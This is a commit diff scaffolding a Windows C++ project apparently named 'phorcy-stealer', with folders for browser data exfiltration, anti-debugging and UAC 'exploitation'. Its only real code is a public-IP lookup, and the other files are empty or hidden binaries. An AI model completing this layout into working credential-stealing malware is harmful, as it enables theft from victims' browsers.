"DocumentIndex": 10,
"Title": "chromium.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:10:29.995Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 11,
"Title": "gecko.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:10:25.787Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 12,
"Title": "browser.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\browser.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\browser.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:10:18.141Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 13,
"Title": "browser.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\browser.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\browser.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:10:10.643Z",
"EditorCaption": ""
}
]
}
]
}
]
}

BIN
main/port/payload/phorcy/.vs/phorcy-master/v17/Solution.VC.db Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/v17/ipch/AutoPCH/869a110ebc6a1c66/IP.ipch Normal file
View File

Binary file not shown.

31
main/port/payload/phorcy/phorcy-master.sln Normal file
View File

@@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.14.36221.1 d17.14
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "phorcy-master", "phorcy-master\phorcy-master.vcxproj", "{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x64.ActiveCfg = Debug|x64
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x64.Build.0 = Debug|x64
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x86.ActiveCfg = Debug|Win32
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x86.Build.0 = Debug|Win32
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x64.ActiveCfg = Release|x64
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x64.Build.0 = Release|x64
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x86.ActiveCfg = Release|Win32
{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {7C62B06E-06EB-443A-A531-F6E5670C8F49}
EndGlobalSection
EndGlobal

1
main/port/payload/phorcy/phorcy-master/anti_dbg/win/exploitation/conf.h Normal file
View File

@@ -0,0 +1 @@
#pragma once

1
main/port/payload/phorcy/phorcy-master/anti_dbg/win/exploitation/exploitation.h Normal file
View File

@@ -0,0 +1 @@
#pragma once

0
main/port/payload/phorcy/phorcy-master/anti_dbg/win/exploitation/user_account_control.cpp Normal file
View File

0
main/port/payload/phorcy/phorcy-master/conf.cpp Normal file
View File

0
main/port/payload/phorcy/phorcy-master/conn.cpp Normal file
View File

BIN
main/port/payload/phorcy/phorcy-master/connection/cryptography/main.dll Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/phorcy-master/connection/cryptography/threefish512.lib Normal file
View File

Binary file not shown.

1
main/port/payload/phorcy/phorcy-master/include.h Normal file
View File

@@ -0,0 +1 @@
#pragma once

0
main/port/payload/phorcy/phorcy-master/main.cpp Normal file
View File

153
main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj Normal file
View File

@@ -0,0 +1,153 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<ItemGroup>
<ClCompile Include="anti_dbg\win\exploitation\user_account_control.cpp" />
<ClCompile Include="conf.cpp" />
<ClCompile Include="conn.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="windows\exfil\browser\browser.cpp" />
<ClCompile Include="windows\exfil\browser\chromium.cpp" />
<ClCompile Include="windows\exfil\browser\gecko.cpp" />
<ClCompile Include="windows\exfil\browser\shell\shell.cpp" />
<ClCompile Include="windows\exfil\utils\ip.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="anti_dbg\win\exploitation\conf.h" />
<ClInclude Include="anti_dbg\win\exploitation\exploitation.h" />
<ClInclude Include="include.h" />
<ClInclude Include="windows\exfil\browser\browser.h" />
<ClInclude Include="windows\exfil\browser\shell\shell.h" />
<ClInclude Include="windows\exfil\utils\utils.h" />
</ItemGroup>
<ItemGroup>
<Library Include="connection\cryptography\threefish512.lib" />
</ItemGroup>
<ItemGroup>
<None Include="connection\cryptography\main.dll" />
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{f9dfc7ae-c751-420a-ad18-c4d059c1f0b2}</ProjectGuid>
<RootNamespace>phorcy-master</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

72
main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj.filters Normal file
View File

@@ -0,0 +1,72 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="conn.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="conf.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="windows\exfil\browser\browser.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="windows\exfil\browser\gecko.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="windows\exfil\browser\chromium.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="windows\exfil\browser\shell\shell.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="anti_dbg\win\exploitation\user_account_control.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="windows\exfil\utils\ip.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="windows\exfil\browser\browser.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="windows\exfil\browser\shell\shell.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="anti_dbg\win\exploitation\exploitation.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="include.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="anti_dbg\win\exploitation\conf.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="windows\exfil\utils\utils.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Library Include="connection\cryptography\threefish512.lib" />
</ItemGroup>
<ItemGroup>
<None Include="connection\cryptography\main.dll" />
</ItemGroup>
</Project>

6
main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj.user Normal file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ShowAllFiles>true</ShowAllFiles>
</PropertyGroup>
</Project>

0
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/browser.cpp Normal file
View File

1
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/browser.h Normal file
View File

@@ -0,0 +1 @@
#pragma once

0
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/chromium.cpp Normal file
View File

0
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/gecko.cpp Normal file
View File

0
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/shell/shell.cpp Normal file
View File

1
main/port/payload/phorcy/phorcy-master/windows/exfil/browser/shell/shell.h Normal file
View File

@@ -0,0 +1 @@
#pragma once

105
main/port/payload/phorcy/phorcy-master/windows/exfil/utils/ip.cpp Normal file
View File

@@ -0,0 +1,105 @@
#include <iostream>
#include <string>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
namespace Utils {
DWORD GetIPAddr(std::string& ip_addr) {
// 1. Initialize Winsock
WSADATA wsaData;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
return 0;
}
// 2. Resolve the server address
struct addrinfo* result = NULL, hints;
const char* hostname = "api.ipify.org";
const char* path = "/";
ZeroMemory(&hints, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
if (getaddrinfo(hostname, "80", &hints, &result) != 0) {
WSACleanup();
return 0;
}
// 3. Connect to the server
SOCKET ConnectSocket = INVALID_SOCKET;
struct addrinfo* ptr = NULL;
for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
if (ConnectSocket == INVALID_SOCKET) {
WSACleanup();
return 0;
}
if (connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen) == SOCKET_ERROR) {
closesocket(ConnectSocket);
ConnectSocket = INVALID_SOCKET;
continue;
}
break;
}
freeaddrinfo(result);
if (ConnectSocket == INVALID_SOCKET) {
WSACleanup();
return 0;
}
// 4. Send HTTP GET request
std::string request = "GET " + std::string(path) + " HTTP/1.1\r\n"
"Host: " + std::string(hostname) + "\r\n"
"User-Agent: CppWinsockClient/1.0\r\n"
"Connection: close\r\n\r\n";
if (send(ConnectSocket, request.c_str(), (int)request.length(), 0) == SOCKET_ERROR) {
closesocket(ConnectSocket);
WSACleanup();
return 0;
}
// 5. Receive the response
char recvbuf[4096];
int iResult;
std::string responseData;
do {
iResult = recv(ConnectSocket, recvbuf, sizeof(recvbuf) - 1, 0);
if (iResult > 0) {
recvbuf[iResult] = '\0';
responseData += recvbuf;
}
} while (iResult > 0);
// 6. Extract and print ONLY the IP (Body)
// The body is separated from headers by a double newline "\r\n\r\n"
size_t headerEnd = responseData.find("\r\n\r\n");
if (headerEnd != std::string::npos) {
std::string ip = responseData.substr(headerEnd + 4);
ip_addr = ip;
//std::cout << ip << std::endl;
}
else {
//std::cerr << "Invalid response format" << std::endl;
closesocket(ConnectSocket);
WSACleanup();
return 0;
}
// 7. Cleanup
closesocket(ConnectSocket);
WSACleanup();
return 1;
}
}

1
main/port/payload/phorcy/phorcy-master/windows/exfil/utils/utils.h Normal file
View File

@@ -0,0 +1 @@
#pragma once